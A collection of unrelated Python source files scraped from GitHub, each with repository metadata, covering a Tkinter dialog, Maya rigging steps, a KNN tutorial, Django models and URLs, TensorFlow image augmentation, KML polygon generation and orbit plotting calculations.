fileName = askopenfilename(parent=self.master, initialdir=preferences.dataset_last_opened_dir(), defaultextension=".xml")
if len(fileName) > 0: self.addDatasetFromPath(fileName)
def addDatasetFromPath(self, path, index = None):
try:
preferences.datasetLastOpened = path
preferences.save()
except ExceptionType as e:
self.addMessage("Cannot save preferences: %s" % e)
path = self.relativePath.convertToRelativePath(path)
if index != None:
self.datasetsListBoxEntry.listbox.delete(index, index)
self.datasetsListBoxEntry.listbox.insert(index, path)
else:
self.datasetsListBoxEntry.listbox.insert(END, path)
self.validateDatasets.validate()
def removeDatasets(self):
items = self.datasetsListBoxEntry.listbox.curselection()
pos = 0
for i in items:
idx = int(i) - pos
self.datasetsListBoxEntry.listbox.delete(idx, idx)
pos += 1
self.validateDatasets.validate()
if __name__ == "__main__":
dialog = PortfolioDialog(self.root, WindowStatus(self), self.LoadPortfolioFromPath, portfolioConfiguration)
|
PCWG/PCWG
|
test-gui/gui/pcwg_ui/portfolio.py
|
portfolio.py
|
py
| 10,704 |
python
|
en
|
code
| 23 |
github-code
|
6
|
32644493827
|
import pymel.core as pm
from mgear.core import attribute
class customShifterMainStep(object):
'''
Main Class for shifter custom steps
'''
def __init__(self, stored_dict):
"""Constructor
"""
self._step_dict = stored_dict
@property
def mgear_run(self):
"""Returns the resulting object of the 'mgearRun' step.
"""
if "mgearRun" not in self._step_dict:
raise Exception(
"Can't access the 'mgearRun' in pre steps \
or when running individual steps.")
return self._step_dict.get('mgearRun')
def component(self, name):
"""Access to components from the current build process.
Args:
name (str): The name of the component
Returns:
Component: The matching Component object
"""
if name not in self.mgear_run.components:
raise KeyError("Could not find the '{}' component.".format(name))
return self.mgear_run.components[name]
def custom_step(self, name):
"""Allows access to custom steps that have already ran in the past.
Args:
name (str): The name of the custom step
Returns:
customShifterMainStep: The matching customShifterMainStep object
"""
if name not in self._step_dict:
raise KeyError(
"The custom step '{}' does not exist, or \
did not run yet.".format(name))
return self._step_dict[name]
def setup(self):
"""This function mus be re implemented for each custom step.
Raises:
Exception: Description
"""
raise NotImplemented("'setup' must be implemented")
def run(self):
"""This function mus be re implemented for each custom step.
Raises:
Exception: Description
"""
raise NotImplemented("'run' must be implemented")
def dup(self, source, name=None):
"""Duplicate the source object and rename it
Args:
source (PyNode): The Source object to duplicate
name (None, string): The name for the new object. If the value
is None the name will be set by using the custom step name
Returns:
PyNode: The new duplicated object.
"""
dup = pm.duplicate(source)[0]
dup.visibility.set(True)
attribute.unlockAttribute(dup)
if name:
pm.rename(dup, name)
else:
pm.rename(dup, "_".join([source.name(), self.name, "setup"]))
pm.parent(dup, self.setup_root)
return dup
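# Editorial sketch (not part of mGear): a minimal example of how a concrete
# custom step might subclass customShifterMainStep. The step name, component
# name and node names below are illustrative assumptions about a rig build.
class _DemoCustomStep(customShifterMainStep):
    """Illustrative only: duplicates a component root under a setup group."""

    def setup(self):
        # the shifter builder is expected to call setup() before run()
        self.name = "demoStep"
        self.setup_root = pm.group(empty=True, name=self.name + "_setup")

    def run(self):
        # grab a component from the current build and duplicate its root
        arm = self.component("arm_L0")  # assumes a component with this name exists
        self.dup(arm.root, name="arm_L0_setup_dup")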
|
mgear-dev/mgear4
|
release/scripts/mgear/shifter/custom_step.py
|
custom_step.py
|
py
| 2,657 |
python
|
en
|
code
| 209 |
github-code
|
6
|
27551842247
|
#K-Nearest Neighbour
#importing the libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
#use the first column of the csv as the DataFrame index (index_col=0)
data=pd.read_csv('./Dataset/Classified Data',index_col=0)
#standardize the values
from sklearn.preprocessing import StandardScaler
#Create a StandardScaler object
scaler=StandardScaler()
#fit the scaler and transform the features to standardized values
scaler.fit(data.drop('TARGET CLASS',axis=1))
scaled_features=scaler.transform(data.drop('TARGET CLASS',axis=1))
#The scaled array has no index or column names,
#so store the scaled features in a DataFrame and
#fill the column names from the original data,
#dropping the target class because it is the
#dependent (output) feature rather than an input
df_feat=pd.DataFrame(scaled_features,columns=data.columns[:-1])
#sns.pairplot(data,hue='TARGET CLASS')
#Separate the train and test data
from sklearn.model_selection import train_test_split
#arguments: independent features (inputs) first, then the dependent feature (output)
x_train,x_test,y_train,y_test=train_test_split(scaled_features,data['TARGET CLASS'])
#k_nearest Neighbour
from sklearn.neighbors import KNeighborsClassifier
#Giving K=1
knn = KNeighborsClassifier(n_neighbors=1)
knn.fit(x_train,y_train)
pred=knn.predict(x_test)
#use the confusion matrix to see which values were predicted
#correctly and which were misclassified
from sklearn.metrics import classification_report,confusion_matrix
#here you can see how the predictions break down by class
print(confusion_matrix(pred,y_test))
#the classification report gives accuracy, precision, recall and f1 scores
print(classification_report(pred,y_test))
#compute the error rate over a range of K values to find where it settles
error_rate=[]
for i in range(1,40):
knn=KNeighborsClassifier(n_neighbors=i)
knn.fit(x_train,y_train)
pred=knn.predict(x_test)
error_rate.append(np.mean(pred!=y_test))
#plot the error rate against the K values just evaluated
plt.figure(figsize=(10,6))
plt.plot(range(1,40),error_rate,linestyle="dashed",marker="o",markersize=10,
markerfacecolor="red")
plt.title("Error Rate Graph")
plt.xlabel("K-value")
plt.ylabel("Error_Rate")
#the error rate stays low and stable after k=24, so choose that value
knn=KNeighborsClassifier(n_neighbors=24)
knn.fit(x_train,y_train)
pred=knn.predict(x_test)
#Confusion Matrix
print(confusion_matrix(y_test,pred))
#classification report
print(classification_report(y_test,pred))
#You can see that accuracy has increased
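#Editorial aside (not part of the original script): the same K selection can be
#done more systematically with cross-validation; this sketch reuses x_train and
#y_train from above, and the K range is an assumption
from sklearn.model_selection import GridSearchCV
param_grid = {"n_neighbors": list(range(1, 40))}
grid = GridSearchCV(KNeighborsClassifier(), param_grid, cv=5, scoring="accuracy")
grid.fit(x_train, y_train)
print("Best K from cross-validation:", grid.best_params_["n_neighbors"])
print("Cross-validated accuracy:", grid.best_score_)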
|
kamarajanis/Machine-Learning
|
K_Nearest_Neighbor/k-nearest.py
|
k-nearest.py
|
py
| 2,535 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21835433544
|
"""Labels app urls"""
from django.urls import path
from task_manager.labels.views import (
LabelsView,
LabelUpdateView,
LabelCreateView,
LabelDeleteView,
)
app_name = 'labels'
urlpatterns = [
path('', LabelsView.as_view(), name='index'),
path('<int:pk>/update/', LabelUpdateView.as_view(), name='upd_label'),
path('<int:pk>/delete/', LabelDeleteView.as_view(), name='del_label'),
path('create/', LabelCreateView.as_view(), name='create'),
]
|
GunGalla/python-project-52
|
task_manager/labels/urls.py
|
urls.py
|
py
| 476 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20844849225
|
import tensorflow.compat.v1 as tf
"""
`image` is assumed to be a float tensor with shape [height, width, 3].
It is a RGB image with pixel values in the range [0, 1].
"""
def random_color_manipulations(image, probability=0.5, grayscale_probability=0.1):
"""
This function randomly changes color of an image.
It is taken from here:
https://cloud.google.com/tpu/docs/inception-v3-advanced
"""
def manipulate(image):
br_delta = tf.random_uniform([], -32.0/255.0, 32.0/255.0)
cb_factor = tf.random_uniform([], -0.1, 0.1)
cr_factor = tf.random_uniform([], -0.1, 0.1)
red_offset = 1.402 * cr_factor + br_delta
green_offset = -0.344136 * cb_factor - 0.714136 * cr_factor + br_delta
blue_offset = 1.772 * cb_factor + br_delta
channels = tf.split(axis=2, num_or_size_splits=3, value=image)
channels[0] += red_offset
channels[1] += green_offset
channels[2] += blue_offset
image = tf.concat(axis=2, values=channels)
image = tf.clip_by_value(image, 0.0, 1.0)
return image
def to_grayscale(image):
image = tf.image.rgb_to_grayscale(image)
image = tf.image.grayscale_to_rgb(image)
return image
do_it = tf.less(tf.random_uniform([]), probability)
image = tf.cond(do_it, lambda: manipulate(image), lambda: image)
do_it = tf.less(tf.random_uniform([]), grayscale_probability)
image = tf.cond(do_it, lambda: to_grayscale(image), lambda: image)
return image
def random_pixel_value_scale(image, probability=0.5, minval=0.9, maxval=1.1):
"""
This function scales each pixel
independently of the other ones.
Arguments:
image: a float tensor with shape [height, width, 3],
an image with pixel values varying between zero and one.
probability: a float number.
minval: a float number, lower ratio of scaling pixel values.
maxval: a float number, upper ratio of scaling pixel values.
Returns:
a float tensor with shape [height, width, 3].
"""
def random_value_scale(image):
color_coefficient = tf.random_uniform(
tf.shape(image), minval=minval,
maxval=maxval, dtype=tf.float32
)
image = tf.multiply(image, color_coefficient)
image = tf.clip_by_value(image, 0.0, 1.0)
return image
do_it = tf.less(tf.random_uniform([]), probability)
image = tf.cond(do_it, lambda: random_value_scale(image), lambda: image)
return image
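# Editorial usage sketch (not part of the original module): chaining the two
# augmentations on a normalized RGB image tensor. The probabilities below just
# repeat the defaults; how the function is mapped over a dataset is an assumption.
def augment(image):
    # image: float32 tensor, shape [height, width, 3], values in [0, 1]
    image = random_color_manipulations(image, probability=0.5, grayscale_probability=0.1)
    image = random_pixel_value_scale(image, probability=0.5, minval=0.9, maxval=1.1)
    return image

# e.g. inside a tf.data input pipeline (TF1 compat, graph mode):
# dataset = dataset.map(augment, num_parallel_calls=4)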
|
TropComplique/MultiPoseNet
|
detector/input_pipeline/color_augmentations.py
|
color_augmentations.py
|
py
| 2,540 |
python
|
en
|
code
| 9 |
github-code
|
6
|
73696099389
|
import os
import subprocess
from datetime import timedelta
from . import dispersion_file_utils as dfu
from .dispersiongrid import BSDispersionGrid, BSDispersionPlot, create_color_plot
class PolygonGenerator(object):
"""Generates polygon kmls from a NETCDF file representing smoke dispersion
time series.
Public Instance Attributes:
output_dir - output directory containing generated polygon kmls,
legend, xsl file, and cutpoints file
legend_filename - legend's file name
kml_files - list of tuples of the form (<kml file name>, <prediction
timestamp>)
"""
# HACK: It would be more elegant to generate xml using an XML package, like minidom.
# We're using raw strings for speed of implementation.
XSL_FIRST_PART = r"""<?xml version="1.0"?>
<!-- This is an xsl stylesheet to add styles to an OGR generated KML file -->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:kml="http://www.opengis.net/kml/2.2" version="1.0">
<xsl:output method="xml" indent="yes" omit-xml-declaration="no" encoding="utf-8"/>
<!-- In general, just pass through all elements and attributes -->
<xsl:template match="*">
<xsl:copy>
<xsl:copy-of select="@*" />
<xsl:apply-templates />
</xsl:copy>
</xsl:template>
<!-- We want to eliminate any embedded style because we don't want to hide the external styles -->
<xsl:template match="kml:Style" />
<!-- Eliminate Schema and ExtendedData -->
<xsl:template match="kml:Schema" />
<xsl:template match="kml:ExtendedData" />
<xsl:template match="kml:Document">
<xsl:copy>
<xsl:copy-of select="@*" />
"""
XSL_STYLE_ELEMENT = """<Style id=\"%s\">
<PolyStyle>
<color>%s</color>
<fill>%s</fill>
<outline>0</outline>
</PolyStyle>
</Style>
"""
XSL_LAST_PART = r"""<xsl:apply-templates />
</xsl:copy>
</xsl:template>
<xsl:template match="kml:Placemark">
<xsl:copy>
<xsl:copy-of select="@*" />
<styleUrl><xsl:value-of select="./kml:ExtendedData/kml:SchemaData/kml:SimpleData[@name='Category']" /></styleUrl>
<xsl:apply-templates />
</xsl:copy>
</xsl:template>
</xsl:stylesheet>
"""
POLYGONS_CONFIG_SECTION = 'PolygonsKML'
# TODO: pass in individual values from config rather than the config itself.
def __init__(self, config, parameter):
self._config = config
self._parameter = parameter
# TODO: support multiple color schemes
self._color_bar_section = self._config.get(self.POLYGONS_CONFIG_SECTION, 'POLYGON_COLORS').split(',')[0]
self._create_output_dir()
self._import_grid()
self._generate_custom_cutpoints_file()
self._generate_custom_xsl_files()
self._generate_kmls()
self._generate_legend()
def _create_output_dir(self):
self.output_dir = self._config.get(self.POLYGONS_CONFIG_SECTION,
'POLYGONS_OUTPUT_DIR').rstrip('/') + '-' + self._parameter.lower()
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
def _import_grid(self):
self._infile = self._config.get('DispersionGridInput', "FILENAME")
self._makepolygons_infile = "NETCDF:%s:%s" % (self._infile, self._parameter)
self._grid = BSDispersionGrid(self._infile, param=self._parameter) # dispersion grid instance
def _generate_custom_cutpoints_file(self):
self._custom_cutpoints_filename = os.path.join(self.output_dir, 'CutpointsGateway.csv')
        with open(self._custom_cutpoints_filename, 'w') as newfile:
            newfile.write("Name,Threshold\n")
            levels = self._config.get(self._color_bar_section, "DATA_LEVELS").split()
            for i, level in enumerate(levels):
                newfile.write("Cat%d,%s\n" % (i, level))
def _generate_custom_xsl_files(self):
self._custom_xsl_filename = os.path.join(self.output_dir, 'KMLPolygonStyleGateway.xsl')
        with open(self._custom_xsl_filename, 'w') as newfile:
            newfile.write(self.XSL_FIRST_PART)
            hex_colors = self._parse_colors()
            for i, hex_color in enumerate(hex_colors):
                if hex_color == '000000':
                    color_str = '00000000'
                    fill_str = '0'
                else:
                    color_str = '99%s' % (hex_color)
                    fill_str = '1'
                newfile.write(self.XSL_STYLE_ELEMENT % ("Cat%d" % (i), color_str, fill_str))
            newfile.write(self.XSL_LAST_PART)
def _parse_colors(self):
if self._config.getboolean(self._color_bar_section, "DEFINE_RGB"):
r = [int(s) for s in self._config.get(self._color_bar_section, "RED").split()]
g = [int(s) for s in self._config.get(self._color_bar_section, "GREEN").split()]
b = [int(s) for s in self._config.get(self._color_bar_section, "BLUE").split()]
if not len(r) == len(g) == len(b):
raise Exception("Configuration ERROR... RED, GREEN, BLUE must specify same number of values.")
# kml colors are specified as 'aabbggrr' (where 'aa' is the alpha value)
return ['%02x%02x%02x' % (b[i], g[i], r[i]) for i in range(len(r))]
elif self._config.getboolean(self._color_bar_section, "DEFINE_HEX"):
return [s.strip('#') for s in self._config.get(self._color_bar_section, "HEX_COLORS").split()]
else:
raise Exception("Configuration ERROR... DEFINE_RGB or HEX_COLORS must be true.")
def _generate_kmls(self):
self._kml_file_basename, ext = os.path.splitext(os.path.basename(self._infile))
dfu.create_polygon_kmls_dir(self._config, self._parameter)
self.kml_files = []
# def my_output_handler(logger, output, is_stderr):
# logger.log(OUTPUT, output)
for i in range(self._grid.num_times):
            try:
                self._generate_kml(i)
            except Exception:
                # stop at the first band that fails to generate
                break
def _generate_kml(self, i):
dt = self._grid.datetimes[i] - timedelta(hours=1)
band = i + 1
#self.log.debug("Processing %s band %2d: %s...", name, band, dt.strftime("%Y-%m-%d %HZ"))
#kmlfile = dt.strftime(name + "_%Y%m%d%H.kml")
kmlfile = self._kml_file_basename + str(band) + ".kml"
poly_file = os.path.join(self.output_dir, kmlfile)
#self.log.debug("Opened poly_file %s", poly_file)
args = [
self._config.get(self.POLYGONS_CONFIG_SECTION, "MAKEPOLYGONS_BINARY"),
"-in=" + self._makepolygons_infile,
"-band=" + str(band),
"-cutpoints=" + os.path.abspath(self._custom_cutpoints_filename),
"-format=KML",
"-kmlStyle=" + self._custom_xsl_filename,
"-out=" + poly_file
]
if subprocess.call(' '.join(args), shell=True) != 0:
msg = "Failure while trying to create %s" % (poly_file)
#self.log.error(msg)
raise RuntimeError(msg)
self.kml_files.append((kmlfile, dt))
LEGEND_FILENAME_ROOT = 'colorbar_polygons'
def _generate_legend(self):
plot = create_color_plot(self._config, self._parameter, self._grid,
self._color_bar_section)
root_w_parameter = "{}_{}".format(self._parameter.lower(),
self.LEGEND_FILENAME_ROOT)
plot.make_colorbar(os.path.join(self.output_dir, root_w_parameter))
self.legend_filename = "%s.%s" % (root_w_parameter, plot.export_format)
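# Minimal usage sketch (an assumption-laden illustration: `config` would be a
# ConfigParser-like object providing the sections referenced above, e.g. 'PolygonsKML',
# 'DispersionGridInput' and the configured color-bar section; 'PM25' is illustrative):
#
#   generator = PolygonGenerator(config, 'PM25')
#   print(generator.output_dir, generator.legend_filename)
#   for kml_filename, timestamp in generator.kml_files:
#       print(timestamp, kml_filename)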
|
pnwairfire/blueskykml
|
blueskykml/polygon_generator.py
|
polygon_generator.py
|
py
| 7,736 |
python
|
en
|
code
| 0 |
github-code
|
6
|
74992294908
|
from django.core.exceptions import ValidationError
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.utils.translation import gettext_lazy as _
from django.contrib.postgres.fields import ArrayField
from udemy.apps.core.models import TimeStampedBase, OrderedModel, CreatorBase
from udemy.apps.course.models import Course
from udemy.apps.module.models import Module
from udemy.apps.quiz.annotations import QuizAnnotations
class Quiz(TimeStampedBase, OrderedModel):
title = models.CharField(_('Title'), max_length=200)
description = models.TextField(_('Description'))
is_published = models.BooleanField(default=False)
is_draft = models.BooleanField(default=True)
is_timed = models.BooleanField(default=False)
pass_percent = models.PositiveIntegerField(validators=[MaxValueValidator(100)])
module = models.ForeignKey(
Module,
related_name='quizzes',
on_delete=models.CASCADE,
)
course = models.ForeignKey(
Course,
related_name='quizzes',
on_delete=models.CASCADE,
)
order_in_respect = ('course', 'module')
annotation_class = QuizAnnotations()
class Question(TimeStampedBase, OrderedModel):
question = models.TextField()
feedback = models.TextField()
answers = ArrayField(models.TextField())
max_time = models.PositiveIntegerField(default=0)
quiz = models.ForeignKey(
Quiz,
related_name='questions',
on_delete=models.CASCADE
)
course = models.ForeignKey(
Course,
related_name='questions_quiz',
on_delete=models.CASCADE,
)
correct_response = models.IntegerField(validators=[MinValueValidator(1)])
order_in_respect = ('quiz',)
def save(self, *args, **kwargs):
if self.correct_response > len(self.answers):
raise ValidationError({'correct_response': 'invalid response'})
super().save(*args, **kwargs)
class QuizRelation(CreatorBase, TimeStampedBase):
quiz = models.ForeignKey(Quiz, on_delete=models.CASCADE)
done = models.BooleanField(default=False)
class Meta:
constraints = [
models.UniqueConstraint(fields=('creator', 'quiz'), name='unique quiz relation')]
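# Hypothetical sketch of the save-time check in Question.save above (assumptions:
# `quiz` and `course` objects already exist; field values are illustrative only):
#
#   question = Question(
#       question='2 + 2 = ?', feedback='Basic arithmetic',
#       answers=['3', '4', '5'], correct_response=4,   # only 3 answers -> ValidationError
#       quiz=quiz, course=course,
#   )
#   question.save()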
|
gabrielustosa/udemy-old
|
udemy/apps/quiz/models.py
|
models.py
|
py
| 2,272 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34465989712
|
import math
import numpy as np
import pandas as pd
n = 10
x = np.random.randint(0, 50, n)
y = np.random.randint(0, 50, n)
lista = []
listb = []
listc = []
for i in range(n-1):
for j in range(i+1, n):
lista.append((x[i]-x[j])*(x[i]-x[j]))
listb.append((y[i]-y[j])*(y[i]-y[j]))
for i in range(len(lista)):
listc.append(math.sqrt(lista[i]+listb[i]))
print(listc)
# 2
listd = []
x = np.random.randint(0, 50, [n, 2])
y = np.zeros([n, n])
for i in range(n):
for j in range(i, n):
y[i, j] = y[j, i] = np.sqrt(np.sum((x[i]-x[j])**2))
y = y.round(2)
print(y)
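# Equivalent vectorized form of the distance matrix above via NumPy broadcasting
# (a sketch; it reuses the same `x` of shape (n, 2) from part 2):
diff = x[:, None, :] - x[None, :, :]
dist = np.sqrt((diff**2).sum(axis=-1)).round(2)
print(dist)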
|
lmyljjljh/shujufenxi
|
sjcjyfx/20221111b.py
|
20221111b.py
|
py
| 587 |
python
|
en
|
code
| 1 |
github-code
|
6
|
7241271696
|
####################
# Joint distribution of Ask/Bid Qty
####################
import os
import pickle
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d import axes3d
data_directory = 'data/xFGBL'
img_directory = 'images/'
data_file = 'xFGBL20130702.pkl'
for fn in os.listdir(data_directory):
with open(os.path.join(data_directory, fn), 'rb') as input:
r=pickle.load(input)
X = r['AskQty']
Y = r['BidQty']
bins = np.arange(0, 600, 20)
hist, xedges, yedges = np.histogram2d(Y, X, bins=bins, normed=True)
fig = plt.figure()
fig.suptitle(fn, fontsize=20)
ax = fig.add_subplot(111, projection='3d')
elements = (len(xedges) - 1) * (len(yedges) - 1)
X, Y = np.meshgrid(xedges[:-1]+0.25, yedges[:-1]+0.25)
ax.plot_wireframe(X, Y, hist)
# xpos = X.flatten()
# ypos = Y.flatten()
# zpos = np.zeros(elements)
# dx = 10 * np.ones_like(zpos)
# dy = dx.copy()
# dz = hist.flatten()
#ax.bar3d(xpos, ypos, zpos, dx, dy, dz, color='b', zsort='average')
#ax.scatter(xpos, ypos, dz)
#plt.show()
plt.savefig(os.path.join(img_directory, fn + '.png'))
|
maroxe/SchoolProjects
|
EA/joint_distribution.py
|
joint_distribution.py
|
py
| 1,286 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73783427069
|
'''
File containing the PlottingCalculator class
'''
import numpy as np
import math
from pyrigee.orbit import *
'''
The PlottingCalculator class contains functions that calculate coordinates for plotting
things. Used to reduce the amount of code in the OrbitPlotter class.
'''
class PlottingCalculator:
# The number of divisions in wireframe plots for bodies
__PLANET_DIVS = 9j
# The number of divisions in orbit plots
__ORBIT_DIVS = 61
def __init__(self, t):
self.__tick_value = t
'''
Calculates the x, y, z coordinates of a sphere. Used to plot the body defined by the user. Takes
the scaled radius, or the radius of the body scaled to the graph's tick units
'''
def calculate_body_coords(self, scaled_radius):
# Create theta and phi values that run from 0 to 2pi and 0 to pi, respectively
theta, phi = np.mgrid[0:2 * np.pi:self.__PLANET_DIVS, 0:np.pi:self.__PLANET_DIVS]
'''
Calculate x, y, and z of sphere given theta and phi ranges. Divide each radius by tick value to make sure
that the units are correct when displayed
'''
x = scaled_radius * np.cos(theta) * np.sin(phi)
y = scaled_radius * np.sin(theta) * np.sin(phi)
z = scaled_radius * np.cos(phi)
return (x, y, z)
'''
    Calculates the coordinates of an elliptical orbit. Takes the orbit's inclination, eccentricity, and semi-major axis.
    The transfer flag indicates whether or not this is a transfer orbit, in which case only half the orbit will be
    calculated. The negative flag indicates whether or not the orbit should be flipped. Returns the x, y, z coords of the
    elliptical orbit scaled by __tick_value
'''
def calculate_elliptical_orbit_coords(self, inclination, eccentricity, semi_major_axis, transfer, negative):
        # Number to multiply pi by when bounding np.linspace. Default is -2 to plot an entire polar coordinate
pi_multiplier = -2
# If user only wants to plot half the orbit, change pi multiplier to -1, so that np.linspace goes from 0 to pi
if transfer:
pi_multiplier = -1
theta = np.linspace(pi_multiplier * np.pi, 0, self.__ORBIT_DIVS)
# Convert inclination to radians
inclination = np.radians(inclination)
# Polar equation of ellipse
r = (semi_major_axis * (1 - eccentricity**2)) / (1 - eccentricity * np.cos((theta)))
# Flip orbit if negative flag is true
if negative:
r *= -1
        # Convert polar equations to cartesian coords based on the given orbital inclination
x = r * np.cos(theta) * np.cos(inclination)
y = r * np.sin(theta)
z = x * np.tan(inclination)
# Return the scaled coordinates of the elliptical orbit
return self.calculate_scaled_coords(x, y, z)
'''
Calculates the coordinates of a parabolic orbit. Takes an orbit object representing the orbit and the radius of the
body being orbited. Returns the x, y, z coords of the orbit scaled by __tick_value
'''
def calculate_parabolic_orbit_coords(self, orbit, body_radius):
# Create theta value for periodic plotting
theta = np.linspace(0, 2 * np.pi, self.__ORBIT_DIVS)
        # Polar equation of the parabola
r = ((orbit.perigee) * 2 + (body_radius * 2)) / (1 - np.cos(theta))
        # Convert polar equations to cartesian coords based on the given orbital inclination
x = r * np.cos(theta) * np.cos(np.radians(orbit.inclination))
y = r * np.sin(theta)
z = r * np.sin(np.radians(orbit.inclination)) * np.cos(theta)
# Return the scaled coordinates of the parabolic orbit
return self.calculate_scaled_coords(x, y, z)
'''
    Calculates the coordinates of the ascending node. Takes the radius of the body being orbited, the orbit's
    inclination, the apogee, and the perigee. Returns the coordinates scaled by __tick_value
'''
def calculate_ascending_node_coords(self, body_radius, inclination, apogee, perigee):
# Calculate the apoapsis/periapsis (distances from center of mass) of target orbit where inclination arrow will be plotted
apoapsis = apogee + body_radius
periapsis = perigee + body_radius
# Calculate ascending node height
ascending_node_height = math.sqrt(apoapsis * periapsis)
# Return the scaled coordinates of the inclination change arrow
return self.calculate_scaled_coords(0, -ascending_node_height, 0)
'''
Calculates the coordinates of the apogee text annotation. Takes the x, y, and z coordinates of the orbit, each
as a list of numbers
'''
def calculate_apogee_text_coords(self, x, y, z):
# Get coordinates of apogee text
apogee_x = x[0]
apogee_y = y[0]
apogee_z = z[0]
return (apogee_x, apogee_y, apogee_z)
'''
Calculates the coordinates of the perigee text annotation. Takes the x, y, and z coordinates of the orbit, each
as a list of numbers
'''
def calculate_perigee_text_coords(self, x, y, z):
# Index of orbit coordinates of the orbit's perigee
perigee_coord_index = int(x.size / 2)
# Get coordinates of perigee text
perigee_x = x[perigee_coord_index]
perigee_y = y[perigee_coord_index]
perigee_z = z[perigee_coord_index]
return (perigee_x, perigee_y, perigee_z)
'''
Takes three lists, each representing x, y, and z coordinates, respectively. Returns these coordinates scaled
by __tick_value
'''
def calculate_scaled_coords(self, x, y, z):
return (x / self.__tick_value, y / self.__tick_value, z / self.__tick_value)
'''
Calculates the orbit, eccentricity, and semi-major axis of the transfer orbit. The transfer orbit is the elliptical
orbit that transitions from one circular orbit to another. Takes the initial orbit, the target orbit, and the radius
of the body being orbited
'''
def calculate_transfer_orbit_elements(self, initial_orbit, target_orbit, body_radius):
# Calculate apogee, perigee, apoapsis, and periapsis of the transfer orbit
transfer_apogee = target_orbit.apogee
transfer_perigee = initial_orbit.perigee
transfer_apoapsis = transfer_apogee + body_radius
transfer_periapsis = transfer_perigee + body_radius
# Calculate semi-major axis of transfer orbit
transfer_semi_major_axis = (transfer_apoapsis + transfer_periapsis) / 2
# Calculate eccentricity of transfer orbit
transfer_eccentricity = (transfer_apoapsis - transfer_periapsis) / (transfer_apoapsis + transfer_periapsis)
# Variable to hold the inclination of the transfer orbit
transfer_inclination = 0
'''
Determine whether the initial or target orbit is the higher one, and set the transfer inclination as needed.
The transfer orbit will be plotted to show path taken either before or after an inclination change, whichever
is most efficient
'''
if initial_orbit.apogee > target_orbit.apogee:
transfer_inclination = target_orbit.inclination
else:
transfer_inclination = initial_orbit.inclination
# If the transfer apogee < transfer perigee (such as when maneuvering from higher orbit to a lower orbit), flip the values
        if transfer_apogee < transfer_perigee:
            transfer_apogee, transfer_perigee = transfer_perigee, transfer_apogee
# Return a new orbit that represents the elliptical transfer orbit, the transfer eccentricity, and the transfer semi-major axis
return (Orbit(transfer_apogee, transfer_perigee, transfer_inclination), transfer_eccentricity, transfer_semi_major_axis)
'''
Calculates the orbit, eccentricity, and semi-major axis of the in-between orbit. The in-between orbit is the orbit the
spacecraft will be in after an inclination change to show how the spacecraft will transition between inclination changes
and Hohmann transfer orbits. Takes the initial orbit, the target orbit, and the radius of the body being orbited
'''
def calculate_in_between_orbit_elements(self, initial_orbit, target_orbit, body_radius):
# Variables to hold in-between apogee and perigee
in_between_apogee = 0
in_between_perigee = 0
# Variable to hold inclination of the in-between orbit
in_between_inclination = 0
# If maneuver shrinks the orbit
if initial_orbit.apogee > target_orbit.apogee:
in_between_apogee = initial_orbit.apogee
in_between_perigee = initial_orbit.perigee
in_between_inclination = target_orbit.inclination
# If the maneuver expands the orbit
else:
in_between_apogee = target_orbit.apogee
in_between_perigee = target_orbit.perigee
in_between_inclination = initial_orbit.inclination
# Calculate in-between orbit apsis
in_between_apoapsis = in_between_apogee + body_radius
in_between_periapsis = in_between_perigee + body_radius
# Calculate eccentricity of in-between orbit
in_between_eccentricity = (in_between_apoapsis - in_between_periapsis) / (in_between_apoapsis + in_between_periapsis)
# Calculate semi-major axis of in-between orbit
in_between_semi_major_axis = (in_between_apoapsis + in_between_periapsis) / 2
# Return a new orbit that represents the in-between orbit, the in-between eccentricity, and the in-between semi-major axis
return (Orbit(in_between_apogee, in_between_perigee, in_between_inclination), in_between_eccentricity, in_between_semi_major_axis)
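# Minimal usage sketch (assumptions: a tick value of 1000 km, an Earth-like body radius
# of 6371 km, and the Orbit class imported above taking (apogee, perigee, inclination);
# the numbers are illustrative only):
#
#   calc = PlottingCalculator(1000)
#   x, y, z = calc.calculate_elliptical_orbit_coords(
#       inclination=28.5, eccentricity=0.1, semi_major_axis=8000,
#       transfer=False, negative=False)
#   transfer_orbit, ecc, sma = calc.calculate_transfer_orbit_elements(
#       Orbit(400, 400, 0), Orbit(35786, 35786, 0), 6371)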
|
JackCSheehan/pyrigee
|
pyrigee/plotting_calculator.py
|
plotting_calculator.py
|
py
| 9,801 |
python
|
en
|
code
| 9 |
github-code
|
6
|
23099951540
|
from random import random
def check(number,list):
if number in list:
return False
else:
return True
list =[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
def func(i, list):
    # swap the element at position i with the element at a random position
    # (note: the parameter name `list` shadows the built-in type)
    index = int(random()*10)
    if index <= len(list)-1:
        cleaner = list[i]
        list[i] = list[index]
        list[index] = cleaner
for i in list:
func(i,list)
print(list)
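# For comparison, a sketch of the standard Fisher-Yates shuffle (not part of the
# original exercise; `randrange` comes from the standard library `random` module):
#
#   from random import randrange
#   for i in range(len(list) - 1, 0, -1):
#       j = randrange(i + 1)
#       list[i], list[j] = list[j], list[i]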
|
gochicus/python-learning
|
lesson-2/ex5.py
|
ex5.py
|
py
| 382 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70084638589
|
from sklearn.cluster import KMeans
import numpy as np
import matplotlib.pyplot as plt
# X = np.array([[1, 2], [1, 4], [1, 0], [10, 2], [10, 4], [10, 0]])
X = np.array(np.random.random((100, 2)))
kmeans = KMeans(n_clusters=2).fit(X)
print('Labels')
print(kmeans.labels_)
result = kmeans.predict([[0, 0], [12, 3]])
print('result')
print(result)
print('clusters')
print(kmeans.cluster_centers_)
plt.scatter(X[:, 0], X[:, 1], c=kmeans.labels_)
plt.xlabel("X")
plt.ylabel("Y")
plt.show()
|
bpark/ml-demos
|
simple_kmeans.py
|
simple_kmeans.py
|
py
| 486 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31624687973
|
import math
import numpy as np
PSI = (math.sqrt(5) - 1) / 2
PSI_2 = 1 - PSI
TOL = 1.e-5
class Triangle:
def __init__(self, v1, v2, v3):
self.v1 = v1
self.v2 = v2
self.v3 = v3
